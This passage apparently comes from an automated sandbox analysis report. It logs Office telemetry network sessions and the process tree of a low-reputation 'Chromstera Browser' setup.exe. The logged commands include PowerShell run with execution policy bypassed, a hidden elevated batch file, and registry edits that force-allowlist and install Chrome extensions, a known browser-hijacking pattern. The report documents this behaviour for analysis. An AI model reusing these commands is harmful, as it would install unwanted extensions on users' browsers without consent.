142 | 192.168.2.4 | 59162 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:44 UTC | 192 | OUT | GET /rules/rule703451v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:44 UTC | 584 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:44 GMT
Content-Type: text/xml
Content-Length: 1409
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BDFC438CF"
x-ms-request-id: 623250e5-d01e-00ad-1e9c-27e942000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181244Z-r1755647c66hxv26qums8q8fsw00000003mg000000001ncw
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:44 UTC | 1409 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


Session ID | Source IP | Source Port | Destination IP | Destination Port
143 | 192.168.2.4 | 59163 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:45 UTC | 192 | OUT | GET /rules/rule703450v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:45 UTC | 584 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:45 GMT
Content-Type: text/xml
Content-Length: 1372
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
ETag: "0x8DC582BE6669CA7"
x-ms-request-id: 8e66950d-f01e-0003-769c-274453000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181245Z-17fbfdc98bbp77nqf5g2c5aavs00000004z000000000dar7
x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:45 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


Session ID | Source IP | Source Port | Destination IP | Destination Port
144 | 192.168.2.4 | 59164 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:45 UTC | 192 | OUT | GET /rules/rule700901v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:45 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:45 GMT
Content-Type: text/xml
Content-Length: 1408
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE1038EF2"
x-ms-request-id: 77170aa2-001e-0049-0450-235bd5000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181245Z-r1755647c66f4bf880huw27dwc00000006v00000000016kw
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:45 UTC | 1408 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session ID | Source IP | Source Port | Destination IP | Destination Port
145 | 192.168.2.4 | 59165 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:45 UTC | 192 | OUT | GET /rules/rule700900v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:45 UTC | 584 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:45 GMT
Content-Type: text/xml
Content-Length: 1371
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
ETag: "0x8DC582BED3D048D"
x-ms-request-id: 213f141a-701e-0098-0f9c-27395f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181245Z-17fbfdc98bbgnnfwq36myy7z0g00000005w000000000fd6k
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:45 UTC | 1371 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


Session ID | Source IP | Source Port | Destination IP | Destination Port
146 | 192.168.2.4 | 59166 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:45 UTC | 192 | OUT | GET /rules/rule702251v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:45 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:45 GMT
Content-Type: text/xml
Content-Length: 1389
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE0F427E7"
x-ms-request-id: d209a394-901e-00a0-0587-286a6d000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181245Z-r1755647c66pzcrw3ktqe96x2s00000006hg00000000h5vd
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:45 UTC | 1389 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


Session ID | Source IP | Source Port | Destination IP | Destination Port
147 | 192.168.2.4 | 59167 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:45 UTC | 192 | OUT | GET /rules/rule702250v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:45 UTC | 584 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:45 GMT
Content-Type: text/xml
Content-Length: 1352
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
ETag: "0x8DC582BDD0A87E5"
x-ms-request-id: f75da22b-f01e-0085-0130-2788ea000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181245Z-r1755647c66tsn7nz9wda692z000000003v0000000001ha6
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:45 UTC | 1352 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


Session ID | Source IP | Source Port | Destination IP | Destination Port
148 | 192.168.2.4 | 59171 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:46 UTC | 192 | OUT | GET /rules/rule703100v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:46 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:46 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:04 GMT
                                                                                                                                                                            ETag: "0x8DC582BEBCD5699"
                                                                                                                                                                            x-ms-request-id: 38933265-a01e-0053-619c-278603000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181246Z-r1755647c66vwt2b5wfzb6a204000000026g000000000s6s
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:46 UTC | 1356 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703100" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMATS" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
149 | 192.168.2.4 | 59170 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:46 UTC | 192 | OUT | GET /rules/rule703101v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:46 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:46 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                            ETag: "0x8DC582BE0F93037"
                                                                                                                                                                            x-ms-request-id: 2073a42b-101e-0065-1a58-274088000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181246Z-17fbfdc98bbjwdgn5g1mr5hcxn00000003a0000000006qaa
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:46 UTC | 1393 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703101" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMATS"



                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:14:11:19
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\setup.exe"
                                                                                                                                                                            Imagebase:0xba0000
                                                                                                                                                                            File size:9'454'152 bytes
                                                                                                                                                                            MD5 hash:8ACA54559265D2A9AD0A810C425C644F
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:1
                                                                                                                                                                            Start time:14:11:21
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                            Imagebase:0x7ff776780000
                                                                                                                                                                            File size:69'632 bytes
                                                                                                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:2
                                                                                                                                                                            Start time:14:11:21
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding DD3B85FC1F11BB110F90DDDEF4702234 C
                                                                                                                                                                            Imagebase:0x8d0000
                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:14:11:23
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Chromstera Browser" SECONDSEQUENCE="1" CLIENTPROCESSID="7404" AI_MORE_CMD_LINE=1
                                                                                                                                                                            Imagebase:0xba0000
                                                                                                                                                                            File size:9'454'152 bytes
                                                                                                                                                                            MD5 hash:8ACA54559265D2A9AD0A810C425C644F
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:4
                                                                                                                                                                            Start time:14:11:25
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2C
                                                                                                                                                                            Imagebase:0x8d0000
                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:5
                                                                                                                                                                            Start time:14:11:26
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding CB2789DE8A953DFC6FBB92EF73C3F598 E Global\MSI0000
                                                                                                                                                                            Imagebase:0x8d0000
                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:6
                                                                                                                                                                            Start time:14:11:27
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:7
                                                                                                                                                                            Start time:14:11:27
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:8
                                                                                                                                                                            Start time:14:11:28
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe"
                                                                                                                                                                            Imagebase:0x800000
                                                                                                                                                                            File size:1'204'192 bytes
                                                                                                                                                                            MD5 hash:427C459E138B4F33819558D451E8500E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:10
                                                                                                                                                                            Start time:14:11:34
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:11
                                                                                                                                                                            Start time:14:11:34
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:14
                                                                                                                                                                            Start time:14:11:44
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1394.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1332.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1333.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1334.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:15
                                                                                                                                                                            Start time:14:11:44
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:16
                                                                                                                                                                            Start time:14:11:57
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\Installer\MSI4739.tmp
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Windows\Installer\MSI4739.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\chrome.bat"
                                                                                                                                                                            Imagebase:0x7ff77c090000
                                                                                                                                                                            File size:570'176 bytes
                                                                                                                                                                            MD5 hash:514314174B6F6A3AB2195C456B83AA1E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:17
                                                                                                                                                                            Start time:14:11:57
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" "
                                                                                                                                                                            Imagebase:0x7ff65c650000
                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:18
                                                                                                                                                                            Start time:14:11:57
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:19
                                                                                                                                                                            Start time:14:11:57
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                                                                                                                                                                            Imagebase:0x7ff7c6750000
                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

Target ID:20
Start time:14:11:57
Start date:28/10/2024
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
Imagebase:0x7ff7c6750000
File size:77'312 bytes
MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:14:11:57
Start date:28/10/2024
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
Imagebase:0x7ff7c6750000
File size:77'312 bytes
MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:14:11:57
Start date:28/10/2024
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
Imagebase:0x7ff7c6750000
File size:77'312 bytes
MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:14:11:57
Start date:28/10/2024
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
Imagebase:0x7ff7c6750000
File size:77'312 bytes
MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:14:11:58
Start date:28/10/2024
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
Imagebase:0x7ff7c6750000
File size:77'312 bytes
